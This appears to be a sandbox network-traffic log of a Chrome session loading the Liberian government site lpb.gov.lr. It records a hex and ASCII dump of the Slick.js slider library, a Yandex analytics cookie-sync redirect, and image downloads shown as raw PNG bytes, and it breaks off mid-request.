                                                                                                                        2025-01-10 13:54:49 UTC7823INData Raw: 2f 2a 2a 0a 20 2a 20 53 6c 69 64 65 72 0a 20 2a 20 53 6c 69 63 6b 2e 6a 73 0a 20 2a 20 31 2e 39 2e 30 20 7c 20 4b 65 6e 20 57 68 65 65 6c 65 72 20 7c 20 68 74 74 70 3a 2f 2f 6b 65 6e 77 68 65 65 6c 65 72 2e 67 69 74 68 75 62 2e 69 6f 20 7c 20 4d 49 54 20 6c 69 63 65 6e 73 65 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6a 71 75 65 72 79 22 5d 2c 69 29 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 69 28 72 65 71 75 69 72 65 28 22 6a 71 75 65 72 79 22 29 29 3a 69 28 6a 51 75 65 72 79 29
                                                                                                                        Data Ascii: /** * Slider * Slick.js * 1.9.0 | Ken Wheeler | http://kenwheeler.github.io | MIT license */!function(i){"use strict";"function"==typeof define&&define.amd?define(["jquery"],i):"undefined"!=typeof exports?module.exports=i(require("jquery")):i(jQuery)
                                                                                                                        2025-01-10 13:54:50 UTC8000INData Raw: 72 6f 6c 6c 3d 31 29 2c 69 28 22 69 6d 67 5b 64 61 74 61 2d 6c 61 7a 79 5d 22 2c 65 2e 24 73 6c 69 64 65 72 29 2e 6e 6f 74 28 22 5b 73 72 63 5d 22 29 2e 61 64 64 43 6c 61 73 73 28 22 73 6c 69 63 6b 2d 6c 6f 61 64 69 6e 67 22 29 2c 65 2e 73 65 74 75 70 49 6e 66 69 6e 69 74 65 28 29 2c 65 2e 62 75 69 6c 64 41 72 72 6f 77 73 28 29 2c 65 2e 62 75 69 6c 64 44 6f 74 73 28 29 2c 65 2e 75 70 64 61 74 65 44 6f 74 73 28 29 2c 65 2e 73 65 74 53 6c 69 64 65 43 6c 61 73 73 65 73 28 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 2e 63 75 72 72 65 6e 74 53 6c 69 64 65 3f 65 2e 63 75 72 72 65 6e 74 53 6c 69 64 65 3a 30 29 2c 21 30 3d 3d 3d 65 2e 6f 70 74 69 6f 6e 73 2e 64 72 61 67 67 61 62 6c 65 26 26 65 2e 24 6c 69 73 74 2e 61 64 64 43 6c 61 73 73 28 22 64 72 61
                                                                                                                        Data Ascii: roll=1),i("img[data-lazy]",e.$slider).not("[src]").addClass("slick-loading"),e.setupInfinite(),e.buildArrows(),e.buildDots(),e.updateDots(),e.setSlideClasses("number"==typeof e.currentSlide?e.currentSlide:0),!0===e.options.draggable&&e.$list.addClass("dra
                                                                                                                        2025-01-10 13:54:50 UTC8000INData Raw: 64 65 73 54 6f 53 63 72 6f 6c 6c 29 3b 72 65 74 75 72 6e 20 6f 2d 31 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 4c 65 66 74 3d 66 75 6e 63 74 69 6f 6e 28 69 29 7b 76 61 72 20 65 2c 74 2c 6f 2c 73 2c 6e 3d 74 68 69 73 2c 72 3d 30 3b 72 65 74 75 72 6e 20 6e 2e 73 6c 69 64 65 4f 66 66 73 65 74 3d 30 2c 74 3d 6e 2e 24 73 6c 69 64 65 73 2e 66 69 72 73 74 28 29 2e 6f 75 74 65 72 48 65 69 67 68 74 28 21 30 29 2c 21 30 3d 3d 3d 6e 2e 6f 70 74 69 6f 6e 73 2e 69 6e 66 69 6e 69 74 65 3f 28 6e 2e 73 6c 69 64 65 43 6f 75 6e 74 3e 6e 2e 6f 70 74 69 6f 6e 73 2e 73 6c 69 64 65 73 54 6f 53 68 6f 77 26 26 28 6e 2e 73 6c 69 64 65 4f 66 66 73 65 74 3d 6e 2e 73 6c 69 64 65 57 69 64 74 68 2a 6e 2e 6f 70 74 69 6f 6e 73 2e 73 6c 69 64 65 73 54 6f 53 68 6f 77 2a 2d 31 2c
                                                                                                                        Data Ascii: desToScroll);return o-1},e.prototype.getLeft=function(i){var e,t,o,s,n=this,r=0;return n.slideOffset=0,t=n.$slides.first().outerHeight(!0),!0===n.options.infinite?(n.slideCount>n.options.slidesToShow&&(n.slideOffset=n.slideWidth*n.options.slidesToShow*-1,
                                                                                                                        2025-01-10 13:54:50 UTC8000INData Raw: 7d 2c 72 2e 73 72 63 3d 74 7d 29 7d 69 66 28 21 30 3d 3d 3d 73 2e 6f 70 74 69 6f 6e 73 2e 63 65 6e 74 65 72 4d 6f 64 65 3f 21 30 3d 3d 3d 73 2e 6f 70 74 69 6f 6e 73 2e 69 6e 66 69 6e 69 74 65 3f 6f 3d 28 74 3d 73 2e 63 75 72 72 65 6e 74 53 6c 69 64 65 2b 28 73 2e 6f 70 74 69 6f 6e 73 2e 73 6c 69 64 65 73 54 6f 53 68 6f 77 2f 32 2b 31 29 29 2b 73 2e 6f 70 74 69 6f 6e 73 2e 73 6c 69 64 65 73 54 6f 53 68 6f 77 2b 32 3a 28 74 3d 4d 61 74 68 2e 6d 61 78 28 30 2c 73 2e 63 75 72 72 65 6e 74 53 6c 69 64 65 2d 28 73 2e 6f 70 74 69 6f 6e 73 2e 73 6c 69 64 65 73 54 6f 53 68 6f 77 2f 32 2b 31 29 29 2c 6f 3d 73 2e 6f 70 74 69 6f 6e 73 2e 73 6c 69 64 65 73 54 6f 53 68 6f 77 2f 32 2b 31 2b 32 2b 73 2e 63 75 72 72 65 6e 74 53 6c 69 64 65 29 3a 28 74 3d 73 2e 6f 70 74 69
                                                                                                                        Data Ascii: },r.src=t})}if(!0===s.options.centerMode?!0===s.options.infinite?o=(t=s.currentSlide+(s.options.slidesToShow/2+1))+s.options.slidesToShow+2:(t=Math.max(0,s.currentSlide-(s.options.slidesToShow/2+1)),o=s.options.slidesToShow/2+1+2+s.currentSlide):(t=s.opti
                                                                                                                        2025-01-10 13:54:50 UTC8000INData Raw: 70 65 2e 73 65 74 50 72 6f 70 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 69 3d 74 68 69 73 2c 65 3d 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 73 74 79 6c 65 3b 69 2e 70 6f 73 69 74 69 6f 6e 50 72 6f 70 3d 21 30 3d 3d 3d 69 2e 6f 70 74 69 6f 6e 73 2e 76 65 72 74 69 63 61 6c 3f 22 74 6f 70 22 3a 22 6c 65 66 74 22 2c 22 74 6f 70 22 3d 3d 3d 69 2e 70 6f 73 69 74 69 6f 6e 50 72 6f 70 3f 69 2e 24 73 6c 69 64 65 72 2e 61 64 64 43 6c 61 73 73 28 22 73 6c 69 63 6b 2d 76 65 72 74 69 63 61 6c 22 29 3a 69 2e 24 73 6c 69 64 65 72 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 73 6c 69 63 6b 2d 76 65 72 74 69 63 61 6c 22 29 2c 76 6f 69 64 20 30 3d 3d 3d 65 2e 57 65 62 6b 69 74 54 72 61 6e 73 69 74 69 6f 6e 26 26 76 6f 69 64 20 30 3d 3d 3d 65 2e 4d 6f 7a 54 72 61 6e
                                                                                                                        Data Ascii: pe.setProps=function(){var i=this,e=document.body.style;i.positionProp=!0===i.options.vertical?"top":"left","top"===i.positionProp?i.$slider.addClass("slick-vertical"):i.$slider.removeClass("slick-vertical"),void 0===e.WebkitTransition&&void 0===e.MozTran
                                                                                                                        2025-01-10 13:54:50 UTC3509INData Raw: 74 6f 75 63 68 4f 62 6a 65 63 74 2e 63 75 72 59 2d 6c 2e 74 6f 75 63 68 4f 62 6a 65 63 74 2e 73 74 61 72 74 59 2c 32 29 29 29 2c 21 6c 2e 6f 70 74 69 6f 6e 73 2e 76 65 72 74 69 63 61 6c 53 77 69 70 69 6e 67 26 26 21 6c 2e 73 77 69 70 69 6e 67 26 26 72 3e 34 3f 28 6c 2e 73 63 72 6f 6c 6c 69 6e 67 3d 21 30 2c 21 31 29 3a 28 21 30 3d 3d 3d 6c 2e 6f 70 74 69 6f 6e 73 2e 76 65 72 74 69 63 61 6c 53 77 69 70 69 6e 67 26 26 28 6c 2e 74 6f 75 63 68 4f 62 6a 65 63 74 2e 73 77 69 70 65 4c 65 6e 67 74 68 3d 72 29 2c 74 3d 6c 2e 73 77 69 70 65 44 69 72 65 63 74 69 6f 6e 28 29 2c 76 6f 69 64 20 30 21 3d 3d 69 2e 6f 72 69 67 69 6e 61 6c 45 76 65 6e 74 26 26 6c 2e 74 6f 75 63 68 4f 62 6a 65 63 74 2e 73 77 69 70 65 4c 65 6e 67 74 68 3e 34 26 26 28 6c 2e 73 77 69 70 69 6e
                                                                                                                        Data Ascii: touchObject.curY-l.touchObject.startY,2))),!l.options.verticalSwiping&&!l.swiping&&r>4?(l.scrolling=!0,!1):(!0===l.options.verticalSwiping&&(l.touchObject.swipeLength=r),t=l.swipeDirection(),void 0!==i.originalEvent&&l.touchObject.swipeLength>4&&(l.swipin


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        52192.168.2.74984787.250.251.1194432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:49 UTC594OUTGET /sync_cookie_image_check HTTP/1.1
                                                                                                                        Host: mc.yandex.com
                                                                                                                        Connection: keep-alive
                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                        Referer: https://www.lpb.gov.lr/
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        2025-01-10 13:54:50 UTC528INHTTP/1.1 302 Moved temporarily
                                                                                                                        Connection: Close
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:50 GMT
                                                                                                                        Location: https://mc.yandex.ru/sync_cookie_image_start?redirect_domain=mc.yandex.com&token=10611.fXHS7W61Y6QDgz-iN89SHMqW01LOq60hVQ4ZUA2FrU04b5KjMURoB7zeuL92EZhT.tLPpFu6z6BxWNZFxTt2U3r5CCVE%2C
                                                                                                                        Set-Cookie: sync_cookie_csrf=3333922555fake; Expires=Fri, 10-Jan-2025 14:04:50 GMT; Domain=.mc.yandex.com; Path=/; SameSite=None; Secure
                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                        2025-01-10 13:54:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: 0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        53192.168.2.74984869.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:50 UTC724OUTGET /wp-content/uploads/2024/02/mandate2-1536x1152-1.png HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                        Referer: https://www.lpb.gov.lr/
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe; _ym_uid=1736517288271535202; _ym_d=1736517288
                                                                                                                        2025-01-10 13:54:50 UTC365INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:50 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Mon, 05 Feb 2024 10:28:59 GMT
                                                                                                                        ETag: "1cc9f-6109fedff67fb"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 117919
                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                        Expires: Sun, 09 Feb 2025 13:54:50 GMT
                                                                                                                        Vary: User-Agent,Accept-Encoding
                                                                                                                        Content-Type: image/png
                                                                                                                        2025-01-10 13:54:50 UTC7827INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 06 00 00 00 04 80 08 02 00 00 00 b6 a3 11 cd 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0c 91 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 36 2e 30 2d 63 30 30 32 20 37 39 2e 31 36 34 34 36 30 2c 20 32 30 32 30 2f 30 35 2f 31 32 2d 31 36 3a 30 34 3a 31 37 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44
                                                                                                                        Data Ascii: PNGIHDRpHYsiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164460, 2020/05/12-16:04:17 "> <rdf:RD
                                                                                                                        2025-01-10 13:54:50 UTC8000INData Raw: 39 eb 34 a4 cd 77 f5 8d 09 7f d2 f5 f7 6e ed 69 52 f4 b7 4f bb 12 ae 33 7a 70 8c 40 8f 9a 31 a4 15 78 33 bc a3 86 15 cf 29 ad d8 b1 68 fb e5 75 17 ea e7 ee 63 34 8d 68 f3 0b ab 14 c2 2b 2a 3f c1 33 d4 7b 2d ef 2b 8f 90 52 52 34 51 f9 9c ce 2f ac 52 8e 21 fe ee e0 4b 1a 13 a7 68 d1 84 05 ca c1 94 78 9f d7 ad 7b e7 59 e5 32 7f d7 88 49 46 7c ea d8 f5 f9 a5 07 9f 7b 48 4d 75 f3 a4 79 de 5c e8 9e c1 80 2e ff e3 b2 f2 0a 59 99 83 54 66 b8 e3 4e 3a 00 40 8e 00 10 00 a7 aa 2d ab 51 b8 bb 13 05 bb 3b dd f1 20 57 5f 76 ce 3a 6d 69 8b 19 5e 91 68 bd a0 74 a7 9d 8a 0b ff 7b 41 db 0f 1b ba 1a 37 ef af d5 25 0d de 0c 6f 49 d1 c4 e7 1e de 78 79 dd 85 5d b3 5f 4e 76 0e 29 57 72 c4 f7 5f b5 07 5e 50 5e a1 b2 e4 41 cd 7f 3d 7a e6 98 11 9f 3d 0a 82 70 cf 48 a5 bc 0d f7 85
                                                                                                                        Data Ascii: 94wniRO3zp@1x3)huc4h+*?3{-+RR4Q/R!Khx{Y2IF|{HMuy\.YTfN:@-Q; W_v:mi^ht{A7%oIxy]_Nv)Wr_^P^A=z=pH
                                                                                                                        2025-01-10 13:54:50 UTC8000INData Raw: 25 d1 4b 1e bf fb a7 92 57 9c 0e 9c 78 fb 99 37 7e 15 2f 91 0a e7 22 5e 67 2b d8 dd d9 70 fa dd e6 bf 34 9f bd fc 71 64 70 5c ef d7 bd e3 87 8d 8b 59 74 bd 19 de 67 7f bc be 60 f5 ed f1 76 64 09 87 56 49 d3 4e ca ca 29 4f c5 8c fe b4 04 5b 4f 9c 3b 79 f0 cc 21 b1 dc 46 c4 2c c0 c1 ee 4e e5 c1 b3 2c 2f 63 1a 4e c4 c2 fa 25 92 11 43 3c 69 9e 45 13 16 54 d6 cd 93 6e 25 91 87 c6 55 49 f6 fe fa f1 18 a3 ff 58 9e 4b 49 59 58 bf 64 64 ee 08 49 82 c5 96 f0 95 e3 3b 57 4e 5f 1e f3 58 b6 d6 6f 4b 7d 9c b5 54 58 db 20 08 29 b4 09 e6 5c a3 8d bb d6 98 5f bc 95 73 ec 54 47 f3 9f ff 7a 56 65 8e 89 8f 85 22 43 b6 1b 7a 45 4e c8 e4 bd cb 4f 41 cc 0e 95 42 7d f1 a4 79 7e f9 c3 15 bb 9e 54 f5 d5 a7 b3 9a 41 00 46 20 00 d4 4f 3d e1 5f 1c f3 b2 1d ea 09 c5 9c 8a 25 72 31 13
                                                                                                                        Data Ascii: %KWx7~/"^g+p4qdp\Ytg`vdVIN)O[O;y!F,N,/cN%C<iETn%UIXKIYXddI;WN_XoK}TX )\_sTGzVe"CzENOAB}y~TAF O=_%r1
                                                                                                                        2025-01-10 13:54:50 UTC8000INData Raw: 00 46 20 00 64 47 d7 7a ae 95 5c 69 ae f5 5c 1b f9 ff da b2 9a 99 81 19 31 af a3 22 4f 9a 27 2b 73 50 56 e6 a0 39 a5 15 4b 82 8f d7 1e 78 21 61 17 24 9a fc 3a 17 bd f7 a4 e8 b8 29 d1 fa d2 35 f7 16 4f c9 ca 1c 14 6f 85 14 8f 5d 1b f9 f9 fa f6 75 be 64 37 92 f0 d0 04 8b 8e 2e 5a 4e 7a f6 c6 59 eb c7 e4 8d 56 53 fc 66 06 66 1c 6e 3d f2 cc 1b bf 4a e5 f6 23 e0 f3 3f 7e f7 4f 55 ee 51 cc 96 35 75 cf 24 db 15 9b 5f 58 75 f7 6d 93 95 f7 12 d9 57 7e 56 5e 7e 56 9e b8 af 05 2f 2d 34 28 08 e2 bb fa 46 79 77 53 9e 18 85 04 fb ae be 31 d9 db 30 f3 cf af 7a 6a 2a 88 20 08 de 0c af 37 43 c8 ca 1c 54 52 34 71 f1 8c 45 a7 3b 5a 76 bc bf 33 61 35 31 ae 00 a8 39 8f ca 2b 28 9f 47 23 2a 88 5e 65 af a1 ab b1 bd ab bd a4 68 62 f4 9f c6 df f2 7d a1 5e 79 db 09 dc 5b 3c 45 92
                                                                                                                        Data Ascii: F dGz\i\1"O'+sPV9Kx!a$:)5Oo]ud7.ZNzYVSffn=J#?~OUQ5u$_XumW~V^~V/-4(FywS10zj* 7CTR4qE;Zv3a519+(G#*^ehb}^y[<E
                                                                                                                        2025-01-10 13:54:50 UTC8000INData Raw: 5a cf b5 d1 0b 4f 04 9b 22 b3 47 e9 2e d9 3d 4a 26 c2 54 f3 3c 56 e5 4f 02 3e ff e4 fc 52 c9 42 5d 8e 5d 92 00 c9 64 43 7a fd 44 41 4e 7a f6 2d 37 0e 2f ca 2a 94 2c df df 52 6f ce fb 3e 3a 1e 8e 39 39 f3 cf f0 3f 8f 9c 3f a6 4b e6 c4 2c e1 9d a1 ce 77 da 1b e4 29 d7 76 74 fa 66 af a4 16 c4 4b aa 71 09 d0 6b 53 ea f7 28 3f 41 82 7e 65 c0 e8 02 20 ce 1d 93 ec af 54 32 a1 82 44 68 2b 7b 31 e5 a4 67 37 ad 3e 16 7d 7f 15 ee 0b ff 60 cd d4 64 13 2c 19 bc e3 91 df 3e 6a e8 dd b2 d1 45 c5 b6 f5 34 de c5 37 de 1b 31 e6 b7 12 22 79 5d d3 5c 05 74 dc 94 c2 2e 8c a8 bc 76 68 a3 1c 54 53 e2 31 e2 ec cc 2f ac 1a e4 1d 24 08 42 67 a8 d3 29 71 3d 00 ee 40 00 c8 8e d4 07 80 00 00 70 b4 da b2 1a c9 14 63 2d c1 d6 82 d5 b7 27 bb 9d cb eb 2e 44 de 35 08 f5 84 6e 58 34 50 9f
                                                                                                                        Data Ascii: ZO"G.=J&T<VO>RB]]dCzDANz-7/*,Ro>:99??K,w)vtfKqkS(?A~e T2Dh+{1g7>}`d,>jE471"y]\t.vhTS1/$Bg)q=@pc-'.D5nX4P
                                                                                                                        2025-01-10 13:54:50 UTC8000INData Raw: 8b 32 3a 67 b4 31 27 55 a9 e7 9e d3 eb b2 06 56 55 7f a7 67 b5 85 cd a6 0d eb b8 d3 cf a6 06 4e bc 6e 26 34 77 72 a5 fa 72 35 bf b0 ea e9 8a d5 f2 f4 c7 ec 26 45 98 dc 3d 33 d9 b2 57 97 eb 72 74 62 ae 96 14 4d 6c 5a 7d 4c af d9 f1 4c ee d5 d8 b0 99 02 92 42 00 08 56 6a e8 6a dc d9 b0 5b be 7c 4e 69 45 f3 d2 0f d5 dc 55 ce 2f ac ea 58 71 76 fa d8 32 41 10 3c 69 9e 65 33 7f 6e 93 6f 92 d5 28 cf 9d 56 3f 77 df 63 65 d5 f2 4e 46 4b b0 35 de c7 de ca 99 96 f0 f0 6b cb 6a 5e 5b b2 57 7e 05 0a 76 77 96 6f bf 3f e6 4f e4 2f 1e cf 0c cc 50 73 76 02 3e ff 9b 0b f7 59 3b 00 e4 a6 a6 2d 07 4e bc 2d 5f ae 26 bb 72 d2 b3 6b cb 6a 5e 78 e4 79 33 0f 21 27 3d 7b 66 60 86 37 c3 fb 58 59 75 c7 8a b3 b5 65 35 2a 8b 74 c0 e7 5f 36 f3 e7 92 85 31 47 2b b0 aa de 75 86 3a 25 4b
                                                                                                                        Data Ascii: 2:g1'UVUgNn&4wrr5&E=3WrtbMlZ}LLBVjj[|NiEU/Xqv2A<ie3no(V?wceNFK5kj^[W~vwo?O/Psv>Y;-N-_&rkj^xy3!'={f`7XYue5*t_61G+u:%K
                                                                                                                        2025-01-10 13:54:50 UTC8000INData Raw: df a1 1a 49 c1 06 ba 54 91 f5 30 7f 54 c2 6b 23 3d fd bd 2a 3f 53 0f 7b 17 ec e2 6d 64 c0 09 0e 06 7b fa 7b af 7f 77 9d 11 3d 5c 6c cc 6d 63 e6 4e e6 8f 2b 20 11 b1 cc 27 76 3f 1a fa 16 c2 08 df 69 88 ee 42 a5 ae a1 ee ca a6 c5 4c 13 53 96 31 67 4a 56 d1 dd 63 ee 4a b3 a7 4a dc 84 62 62 56 c1 c9 9a e3 85 75 45 91 81 e4 5b 9c b9 6e 6e e5 e8 91 66 13 5d e3 a1 96 b1 e3 85 e6 8d 51 04 81 29 25 ba 82 a8 ac 3d 66 bd 71 bc 81 77 67 53 8e 23 bb 3a af 8a f7 a0 62 59 c6 1c de 06 52 ed 81 8e bd 17 0f 10 4a 25 c8 87 05 20 d0 c5 d7 a1 af 85 81 9e 6d b3 88 27 84 5e b2 1e e6 8f 6a f4 0f 47 f3 42 b8 91 86 2a 6e bb 8b 77 28 00 c3 30 c1 c1 e0 ae e3 6f 4b bc c3 79 93 67 bd 0e e9 8a 0b 24 33 5f d8 e4 d9 1b 59 f1 03 23 94 41 df 42 18 b1 92 65 d0 5d 68 6a ef c5 03 e1 f9 b7 db
                                                                                                                        Data Ascii: IT0Tk#=*?S{md{{w=\lmcN+ 'v?iBLS1gJVcJJbbVuE[nnf]Q)%=fqwgS#:bYRJ% m'^jGB*nw(0oKyg$3_Y#ABe]hj
                                                                                                                        2025-01-10 13:54:50 UTC8000INData Raw: b0 09 6c 69 ee 6c 89 1f c5 8b b4 77 20 20 77 1a 40 60 ca a4 00 25 ad 8f ce cc 01 f5 b0 00 14 bf 82 83 41 e9 37 b5 16 d6 15 b5 07 3a 78 81 23 fe 50 d9 fc b3 4d bc 2e 5e 56 a4 5d 43 dd c2 78 d9 04 b6 d6 fb ac 94 b7 eb 64 bb 6f 87 f4 4b ca 66 cf 81 e6 7e ff b6 c3 8d 69 ab 32 65 8d 19 f5 ad 0d 7b 9a f7 f1 02 75 da 89 90 4e b2 2a 49 65 d3 e2 0d fb 36 0a c3 95 1d de 41 a0 5d 33 94 55 0c 59 b9 2d 42 7a d6 55 36 2d 8e 3a d7 e1 70 ab 3f 52 72 a6 be b5 61 db e1 46 61 b8 2b 73 84 2d 27 48 e6 ff b3 0f 3f 23 9c a9 9f be 70 a6 b0 ae 48 e2 15 da b5 fe 0d e1 5f f2 ed 81 8e 47 d6 cf 8e 5a 5e 66 ef 2d 4d 87 58 c9 32 94 f5 18 7a 18 fb a3 b1 bc 90 f3 3d ed b2 7e 88 72 cb 40 22 2f 20 df 40 48 d6 10 ad 68 9b e6 48 6a 8e d3 52 36 48 7d 1d fa 9a 17 22 7e 10 18 c3 30 9e 6d b3 9e
                                                                                                                        Data Ascii: lilw w@`%A7:x#PM.^V]CxdoKf~i2e{uN*Ie6A]3UY-BzU6-:p?RraFa+s-'H?#pH_GZ^f-MX2z=~r@"/ @HhHjR6H}"~0m
                                                                                                                        2025-01-10 13:54:50 UTC8000INData Raw: c5 3a c5 9d 23 99 5a 11 87 e5 12 46 a6 e6 2b 8e 25 32 ba 85 9e 0a 86 61 46 bc b1 3f de 90 29 41 1e 63 bb 6b c5 d4 74 47 c5 f9 d3 fc 69 c7 e6 d5 2d 90 95 6c 63 33 4a d9 f7 25 d6 1f aa e9 16 b8 fc c9 73 de 57 b9 ed 09 ca c7 7d aa 62 37 69 cb 25 c6 d8 2a 41 09 f2 99 40 7f b5 24 d6 2b 92 cf 0a 95 d3 b3 e2 fc 69 27 6f 3c 5e 58 57 a4 ec ed ca 18 3e 76 30 aa 7f dd 00 49 b8 03 88 5e 23 76 79 c1 c1 60 70 30 28 f2 82 1c 47 f6 ee 9a 9d ca 6e c1 b8 e7 ce 4c 35 dd 1f 37 e6 95 65 cc 11 7f 59 7a a2 53 fd f8 c1 30 cc b6 c3 8d 34 ef c1 16 e9 96 9b 6e d1 75 f5 47 93 5a 11 87 e5 12 e6 b4 3b 09 d4 7c 86 61 dc e3 1e d2 64 98 5c e8 a9 c0 7d 40 91 88 95 60 24 63 bb 6b c5 54 76 47 0c c3 d8 92 6c b2 92 6d 6c 46 29 fb be c4 fa c3 46 ef 56 59 f7 61 45 e5 48 4e a1 7c dc a7 2a 76 93
                                                                                                                        Data Ascii: :#ZF+%2aF?)AcktGi-lc3J%sW}b7i%*A@$+i'o<^XW>v0I^#vy`p0(GnL57eYzS04nuGZ;|ad\}@`$ckTvGlmlF)FVYaEHN|*v
                                                                                                                        2025-01-10 13:54:50 UTC8000INData Raw: 49 41 2b 50 9d 57 b5 b2 fc 57 d2 eb 06 9b c0 16 e7 4f 2b cc 9e f4 fc 8e 15 bc 6b 92 12 91 af 4e 72 63 64 13 d8 b9 93 bd 93 73 1e 5c b3 e7 b7 ca be 23 19 0a be 17 57 76 1b f6 6d 54 76 db 8e b1 cc db ca 28 87 26 c9 43 49 4d a3 bf 73 a6 a4 ab 34 dd 0c 67 ef 82 5d 72 17 08 1c c9 29 2f fe f7 ea e9 f7 15 af dc bf 9a d8 c3 56 8a 1b 02 9b c0 4e cc 2a 98 98 55 50 19 78 9c c0 ca 7b 24 63 e7 ab 6a aa 22 fa 61 ca 91 e9 90 29 19 7d c0 44 b0 00 44 1d 05 bd 39 0f 9b c0 2e f4 54 30 0c a3 a6 31 57 e7 55 bd 54 b1 4e 71 32 4e d6 1c 9f 98 55 a0 e0 8d dc 50 91 31 26 9d f0 f0 af 09 59 99 46 49 41 2b a0 38 e5 6c 02 fb 52 c5 3a 86 61 e4 4e 02 c8 57 27 c5 31 da 92 6c dc 77 a4 93 9a 9c 7c f1 bf 57 8f fd d1 d8 b7 cf ee d1 3c 55 fa 31 6f 2b a3 1c 9a 24 0f 25 35 cd 44 9d b3 b1 5d a5
                                                                                                                        Data Ascii: IA+PWWO+kNrcds\#WvmTv(&CIMs4g]r)/VN*UPx{$cj"a)}DD9.T01WUTNq2NUP1&YFIA+8lR:aNW'1lw|W<U1o+$%5D]


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        54192.168.2.74984969.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:50 UTC725OUTGET /wp-content/uploads/2017/02/Miscellaneous-480x360.jpg HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                        Sec-Fetch-Mode: no-cors
